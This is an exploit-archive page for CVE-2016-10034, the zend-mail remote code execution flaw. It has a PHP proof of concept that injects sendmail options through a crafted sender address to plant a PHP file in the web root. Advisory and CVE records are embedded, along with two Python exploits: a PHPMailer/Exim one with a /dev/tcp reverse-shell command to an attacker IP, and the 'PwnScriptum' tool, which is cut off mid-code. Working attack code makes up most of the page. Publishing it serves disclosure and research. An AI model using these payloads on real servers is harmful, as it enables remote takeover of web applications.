ID 1337DAY-ID-26598 Type zdt Reporter Dawid Golunski Modified 2016-12-31T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
// ------------------
// mail() param injection via the vulnerability in zend-mail
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
'Zend\Loader\StandardAutoloader' => array(
'autoregister_zf' => true
)
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('[email protected]', 'Support');
$message->setSubject('Zend PoC');
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
# 0day.today [2018-01-03] #
{"sourceData": "<?php\r\n \r\n/*\r\n \r\nZend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)\r\nzend-mail < 2.4.11 \r\nzend-mail < 2.7.2 \r\n \r\nDiscovered/Coded by:\r\n \r\nDawid Golunski\r\nhttps://legalhackers.com\r\n \r\nFull Advisory URL:\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html\r\n \r\nVideo PoC\r\nhttps://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html\r\n \r\n \r\nFollow the feed for updates:\r\n \r\nhttps://twitter.com/dawid_golunski\r\n \r\n \r\nA simple PoC (working on Sendmail MTA)\r\n \r\nIt will inject the following parameters to sendmail command:\r\n \r\nArg no. 0 == [/usr/sbin/sendmail]\r\nArg no. 1 == [-t]\r\nArg no. 2 == [-i]\r\nArg no. 3 == [-r]\r\nArg no. 4 == [attacker\\]\r\nArg no. 5 == [-oQ/tmp/]\r\nArg no. 6 == [-X/var/www/cache/phpcode.php]\r\nArg no. 7 == [\"@email.com]\r\n \r\n \r\n \r\nwhich will write the transfer log (-X) into /var/www/cache/phpcode.php file.\r\nNote /var/www/cache must be writable by www-data web user.\r\n \r\nThe resulting file will contain the payload passed in the body of the msg:\r\n \r\n09607 <<< Content-Type: text/html; charset=us-ascii\r\n09607 <<< \r\n09607 <<< <?php phpinfo(); ?>\r\n09607 <<< \r\n09607 <<< \r\n09607 <<< \r\n \r\n \r\nSee the full advisory URL for the exploit details.\r\n \r\n*/\r\n \r\n \r\n// Attacker's input coming from untrusted source such as $_GET , $_POST etc.\r\n// For example from a Contact form with sender field\r\n \r\n$email_from = '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com';\r\n// encoded phpinfo() php code\r\n$msg_body = base64_decode(\"PD9waHAgcGhwaW5mbygpOyA/Pg==\");\r\n \r\n \r\n \r\n// ------------------\r\n \r\n// mail() param injection via the vulnerability in zend-mail\r\n \r\n \r\nchdir(dirname(__DIR__));\r\ninclude 'vendor/Zend/Loader/AutoloaderFactory.php';\r\n \r\nZend\\Loader\\AutoloaderFactory::factory(array(\r\n 'Zend\\Loader\\StandardAutoloader' => array(\r\n 'autoregister_zf' => true\r\n )\r\n));\r\n \r\nZend\\Mvc\\Application::init(require 'config/application.php')->run();\r\n \r\n$message = new \\Zend\\Mail\\Message();\r\n \r\n$message->setBody($msg_body);\r\n$message->setFrom($email_from, 'Attacker');\r\n$message->addTo('[email\u00a0protected]', 'Support');\r\n$message->setSubject('Zend PoC');\r\n \r\n$transport = new \\Zend\\Mail\\Transport\\Sendmail();\r\n$transport->send($message);\r\n \r\n?>\n\n# 0day.today [2018-01-03] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/26598", "reporter": "Dawid Golunski", "href": "https://0day.today/exploit/description/26598", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "db11346ffaa9d2a637072926bcba2475"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "12bf450836db27aa6f937dfdec6a909d"}, {"key": "modified", "hash": "df4bde5fb0a52369c595bc4df00025b2"}, {"key": "published", "hash": "df4bde5fb0a52369c595bc4df00025b2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3a9047e281e97b7589cd8037977208d1"}, {"key": "sourceData", "hash": "eb2de9bdf91eebe23d9271b38e94e288"}, {"key": "sourceHref", "hash": "284c5f7d6f28e625ccc0923625614296"}, {"key": "title", "hash": "cecf80a99c403747ffd61cac294da76d"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 8, "references": [], "lastseen": "2018-01-03T09:01:54", "published": "2016-12-31T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2016-10034"], "id": "1337DAY-ID-26598", "hash": "fedc3583f308b33871b525ee40e3da7d0c3ac3496901d0b736bbdddc603c247c", "modified": "2016-12-31T00:00:00", "title": "Zend Framework / zend-mail 2.4.11 - Remote Code Execution Exploit", "edition": 1, "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-01-03T09:01:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-10034"]}, {"type": "f5", "idList": ["F5:K79502122"]}, {"type": "hackerone", "idList": ["H1:228112"]}, {"type": "exploitdb", "idList": ["EDB-ID:40979", "EDB-ID:42221", "EDB-ID:40986"]}, {"type": "gentoo", "idList": ["GLSA-201804-10"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201804-10.NASL"]}, {"type": "thn", "idList": ["THN:BD003AAB715C2448BF92B78197DE160C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201782688"]}, {"type": "threatpost", "idList": ["THREATPOST:6FB38D322999A6FDD13C28B8C35B0C8F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140349"]}, {"type": "zdt", "idList": ["1337DAY-ID-28005"]}], "modified": "2018-01-03T09:01:54"}, "vulnersScore": 5.0}}
{"cve": [{"lastseen": "2019-05-29T18:15:32", "bulletinFamily": "NVD", "description": "The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \\\" (backslash double quote) in a crafted e-mail address.", "modified": "2018-10-21T10:29:00", "id": "CVE-2016-10034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10034", "published": "2016-12-30T19:59:00", "title": "CVE-2016-10034", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-06-08T00:16:10", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-01-20T00:51:00", "published": "2017-01-16T20:47:00", "id": "F5:K79502122", "href": "https://support.f5.com/csp/article/K79502122", "title": "Zend Framework vulnerability CVE-2016-10034", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 50.0, "description": " i found three vulnerability\nDirectory information disclose,Email address disclose, and possible Remote code execution in Zendmail\nduring signup your code accept username with ',\",/,@ while all of the special character must be forbidden or encoded in username\n\nDirectory Disclose:\n______________________\n 1. goto sign-up page and create a account with username with double quote like as\"\n2. signin and goto ur account and add email address, then logout \n3.goto Forgot-Password section and enter username of above ( as\" )\n4.and see full path of server has been disclose (screenshot: directory.png)\n\nEmail address Disclose\n_________________________\nif you look close to screenshot below that email address of the user also disclose\n\nZendmail rce\n________________________________\nfrom the above screenshot, ur are using zendmail for email verification\nand searching through exploit of zendmail ,i found that Zendmail is vulnerable to Remote code Execution\na security researcher Dawid Golunski discover its flaw CVE-2016-10034 in December\nwhere user can set corrupted email like '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com'; cause RCE\nHis link https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html\nits possible to add such email in user account\ni also reported this flaw of email REGEX https://hackerone.com/reports/226334 but you ignored\n\ni also tried this payload but cant confirm that file has been created or not because i was testing in your website\nyou can also confirm by locally\n\nUsing the above username ( as\") break the sql query during email sending cause exception throw\n\nalso checked that if i used that username in password reset ,server response time is delayed\nit may cause Dos attack but it not possible in that case because u using Cloudflare network to prevent\n\n", "modified": "2017-06-21T01:46:18", "published": "2017-05-13T09:57:58", "id": "H1:228112", "href": "https://hackerone.com/reports/228112", "type": "hackerone", "title": "Paragon Initiative Enterprises: Directory Disclose,Email Disclose Zendmail vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-12-30T17:58:41", "bulletinFamily": "exploit", "description": "Zend Framework / zend-mail < 2.4.11 - Remote Code Execution. CVE-2016-10034. Webapps exploit for PHP platform", "modified": "2016-12-30T00:00:00", "published": "2016-12-30T00:00:00", "id": "EDB-ID:40979", "href": "https://www.exploit-db.com/exploits/40979/", "type": "exploitdb", "title": "Zend Framework / zend-mail < 2.4.11 - Remote Code Execution", "sourceData": "<?php\r\n \r\n/*\r\n \r\nZend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)\r\nzend-mail < 2.4.11 \r\nzend-mail < 2.7.2 \r\n \r\nDiscovered/Coded by:\r\n \r\nDawid Golunski\r\nhttps://legalhackers.com\r\n \r\nFull Advisory URL:\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html\r\n\r\nVideo PoC\r\nhttps://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html\r\n\r\n\r\nFollow the feed for updates:\r\n\r\nhttps://twitter.com/dawid_golunski\r\n\r\n \r\nA simple PoC (working on Sendmail MTA)\r\n \r\nIt will inject the following parameters to sendmail command:\r\n \r\nArg no. 0 == [/usr/sbin/sendmail]\r\nArg no. 1 == [-t]\r\nArg no. 2 == [-i]\r\nArg no. 3 == [-r]\r\nArg no. 4 == [attacker\\]\r\nArg no. 5 == [-oQ/tmp/]\r\nArg no. 6 == [-X/var/www/cache/phpcode.php]\r\nArg no. 7 == [\"@email.com]\r\n\r\n\r\n\r\nwhich will write the transfer log (-X) into /var/www/cache/phpcode.php file.\r\nNote /var/www/cache must be writable by www-data web user.\r\n\r\nThe resulting file will contain the payload passed in the body of the msg:\r\n \r\n09607 <<< Content-Type: text/html; charset=us-ascii\r\n09607 <<< \r\n09607 <<< <?php phpinfo(); ?>\r\n09607 <<< \r\n09607 <<< \r\n09607 <<< \r\n \r\n \r\nSee the full advisory URL for the exploit details.\r\n \r\n*/\r\n \r\n \r\n// Attacker's input coming from untrusted source such as $_GET , $_POST etc.\r\n// For example from a Contact form with sender field\r\n \r\n$email_from = '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com';\r\n// encoded phpinfo() php code\r\n$msg_body = base64_decode(\"PD9waHAgcGhwaW5mbygpOyA/Pg==\");\r\n\r\n\r\n\r\n// ------------------\r\n \r\n// mail() param injection via the vulnerability in zend-mail\r\n\r\n\r\nchdir(dirname(__DIR__));\r\ninclude 'vendor/Zend/Loader/AutoloaderFactory.php';\r\n\r\nZend\\Loader\\AutoloaderFactory::factory(array(\r\n 'Zend\\Loader\\StandardAutoloader' => array(\r\n 'autoregister_zf' => true\r\n )\r\n));\r\n\r\nZend\\Mvc\\Application::init(require 'config/application.php')->run();\r\n\r\n$message = new \\Zend\\Mail\\Message();\r\n\r\n$message->setBody($msg_body);\r\n$message->setFrom($email_from, 'Attacker');\r\n$message->addTo('support@localhost', 'Support');\r\n$message->setSubject('Zend PoC');\r\n\r\n$transport = new \\Zend\\Mail\\Transport\\Sendmail();\r\n$transport->send($message);\r\n\r\n?>\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40979/"}, {"lastseen": "2017-06-22T04:15:01", "bulletinFamily": "exploit", "description": "PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution. CVE-2016-10033,CVE-2016-10034,CVE-2016-10045,CVE-2016-10074. Webapps exploit for PHP platform", "modified": "2017-06-21T00:00:00", "published": "2017-06-21T00:00:00", "id": "EDB-ID:42221", "href": "https://www.exploit-db.com/exploits/42221/", "type": "exploitdb", "title": "PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution", "sourceData": "#!/usr/bin/python\r\n#\r\n# Exploit Title: [RCE for PHPMailer < 5.2.20 with Exim MTA]\r\n# Date: [16/06/2017]\r\n# Exploit Author: [@phackt_ul]\r\n# Software Link: [https://github.com/PHPMailer/PHPMailer]\r\n# Version: [< 5.2.20]\r\n# Tested on: [Debian x86/x64]\r\n# CVE : [CVE-2016-10033,CVE-2016-10074,CVE-2016-10034,CVE-2016-10045]\r\n#\r\n# @phackt_ul - https://phackt.com\r\n#\r\n# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com\r\n# and its research on PHP libraries vulns\r\n#\r\n# PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\n# PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\r\n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n#\r\n# ExploitBox project:\r\n# https://ExploitBox.io\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n# https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n# http://pwnscriptum.com/\r\n#\r\n# --------------------------------------------------------\r\n# Enhanced for Exim MTA\r\n# \r\n# N.B: \r\n# The original author's method in the PHPMailer POC (for sendmail MTA) uses the RFC 3696 \r\n# double quotes technique associated with the -oQ -X options to log mailer traffic and to create \r\n# the backdoor. This technique is not facing some payload size issues because the payload \r\n# was in the email body.\r\n#\r\n# For Exim:\r\n# The original author's Wordpress 4.6 POC for Exim combines the comment syntax (RFC 822)\r\n# and the Exim expansion mode techniques. The use of substr on spool_directory and tod_log \r\n# expansion variables in order to bypass the PHP mail() escaping may leads to large \r\n# email addresses payloads. However the comment syntax validateAddress() technique does not \r\n# face any size limitation but its use can not be applied for PHPMailer < 5.2.20.\r\n#\r\n# Goal:\r\n# The use of double quotes validateAdresse() technique (and it's patch bypass for PHPMailer < 5.5.20) \r\n# combined with the Exim expansion mode technique may leads to large payloads quickly facing addresses\r\n# size limit here (260 chars) and so not matching the pcre8 regexp in the validateAddress() function.\r\n# We are now base64 encoding the command in order to bypass escapeshellcmd() and allowing larger payloads.\r\n# \r\n#\r\n# Usage:\r\n# ./rce_phpmailer_exim4.py -url http://victim/phpmailer/ -cf contact_form.php -ip 192.168.1.109 -p 1337\r\n#\r\n#\r\n# Requirements:\r\n# - Vulnerable PHP libraries\r\n# - Exim MTA Agent\r\n#\r\n# \r\n# Disclaimer:\r\n# For testing purposes only on your local machine - http://pwnscriptum.com/PwnScriptum_PHPMailer_PoC_contactform.zip\r\n\r\nimport argparse\r\nimport urllib\r\nimport urllib2\r\nimport base64\r\n\r\n# Prepare command for Exim expansion mode in order \r\ndef prepare_cmd(cmd):\r\n return '${run{${base64d:%s}}}' % base64.b64encode(cmd)\r\n\r\n# Send Request method\r\ndef send_request(req):\r\n try:\r\n urllib2.urlopen(req)\r\n except urllib2.HTTPError, e:\r\n print \"[!] Got HTTP error: [%d] when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % e.code\r\n exit(3)\r\n except urllib2.URLError, err:\r\n print \"[!] Got the '%s' error when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % err.reason\r\n exit(4)\r\n\r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')\r\nparser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default=\"8888\")\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n\r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n\r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nATTACKER_IP = [%s]\r\nATTACKER_PORT = [%s]\r\nPOST_ACTION = [%s]\r\nPOST_NAME = [%s]\r\nPOST_EMAIL = [%s]\r\nPOST_MSG = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)\r\n\r\n# Ask for mail library\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\"\"\"\r\nprint \"\"\" SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\"\"\"\r\nprint \"\"\" Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\"\"\"\r\nprint \"\\033[0m\"\r\n\r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\n\r\nif (target>2):\r\n print \"No such target. Exiting\\n\"\r\n exit(3)\r\n\r\n################################\r\n# Payload\r\n################################\r\ncmd = \"/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'\"\r\nprepared_cmd = prepare_cmd(cmd)\r\n\r\npayload = '\"a\\\\\" -be ' + prepared_cmd + ' \"@a.co'\r\n\r\n# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)\r\nif target == 2:\r\n payload = \"\\\"a\\\\' -be \" + prepared_cmd + \" \\\"@a.co\"\r\n\r\n################################\r\n# Attack episode\r\n# This step will execute the reverse shell\r\n################################\r\n\r\n# Form fields\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: 'Really important message'}\r\n\r\n# Print relevant information\r\nprint \"\\n[+] Executing command on victim server\\n\"\r\nprint '[!] command: [%s]' % cmd\r\nprint '[!] payload: [%s]' % payload\r\nprint '[!] post_fields: [%s]\\n' % str(post_fields)\r\n\r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nsend_request(req)\r\n\r\nprint \"\\033[1;32m[+] You should check your listener and cross the fingers ;)\\033[0m\\n\"\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42221/"}, {"lastseen": "2017-01-03T01:58:42", "bulletinFamily": "exploit", "description": "PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution. CVE-2016-10033,CVE-2...", "modified": "2017-01-02T00:00:00", "published": "2017-01-02T00:00:00", "id": "EDB-ID:40986", "href": "https://www.exploit-db.com/exploits/40986/", "type": "exploitdb", "title": "PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution", "sourceData": "#!/usr/bin/python\r\n\r\nintro = \"\"\"\\033[94m \r\n __ __ __ __ __ \r\n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\r\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\r\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \r\n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \r\n /____/ \r\n\r\n\r\nPHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit\r\n\t\t a.k.a \"PwnScriptum\"\r\n\r\n CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074\r\n\r\n\r\nThis PoC exploit aims to execute a reverse shell on the target in \r\nthe context of the web-server user via vulnerable PHP email library.\r\n\r\n\r\nDiscovered and Coded by:\r\n\r\n\\033[1;34m \r\n Dawid Golunski\r\n https://legalhackers.com\r\n\r\n t: @dawid_golunski for updates\r\n\\033[0m\r\n\\033[94m \r\nP.$. For testing only! Don't break the Web ;) \r\n\\033[0m\r\n\"\"\"\r\ninfo = \"\"\"\r\n[Version]\r\nLimited (ver. 1.0)\r\n\r\n[PoC Video]\r\nSee the the exploit in action at:\r\n\r\nhttps://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n\r\n[Info]\r\nThis exploit targets a common webapp component - Contact Form. \r\n\r\nIt combines payloads for the following vulns:\r\n\r\n1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n\r\n2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass)\r\nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html\r\n\r\n3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html\r\n\r\n4. Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html\r\n\r\n[Usage]\r\n\r\n./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT\r\n [-d TARGET_UP_DIR] -ip ATTACKERS_IP\r\n [-p ATTACKERS_PORT] [--version]\r\n [--post-action POST_ACTION]\r\n [--post-name POST_NAME]\r\n [--post-email POST_EMAIL]\r\n [--post-msg POST_MSG]\r\n\r\nNote, make sure the contact form matches the default field names (send/name/email/msg). \r\nOtherwise override with --post-msg=message_box for example.\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport argparse\r\nimport time\r\nimport urllib\r\nimport urllib2\r\nimport socket\r\nimport sys\r\n\r\n\r\n# The Main Meat\r\nprint intro\r\n\r\n# Show info\r\nif '-H' in sys.argv:\r\n\tprint info\r\n\texit(0)\r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \\'PwnScriptum\\')\\nDiscovered by Dawid Golunski (https://legalhackers.com)')\r\nparser.add_argument('-H', action='store_true', default=\"false\", required=False, help='Full Help / Info Page')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-d' , dest='TARGET_UP_DIR', required=False, help='Target Upload Dir')\r\nparser.add_argument('-ip', dest='ATTACKERS_IP', required=True, help='Attackers Public IP for RevShell')\r\nparser.add_argument('-p', dest='ATTACKERS_PORT', required=False, help='Attackers Port for RevShell listener')\r\nparser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition')\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field 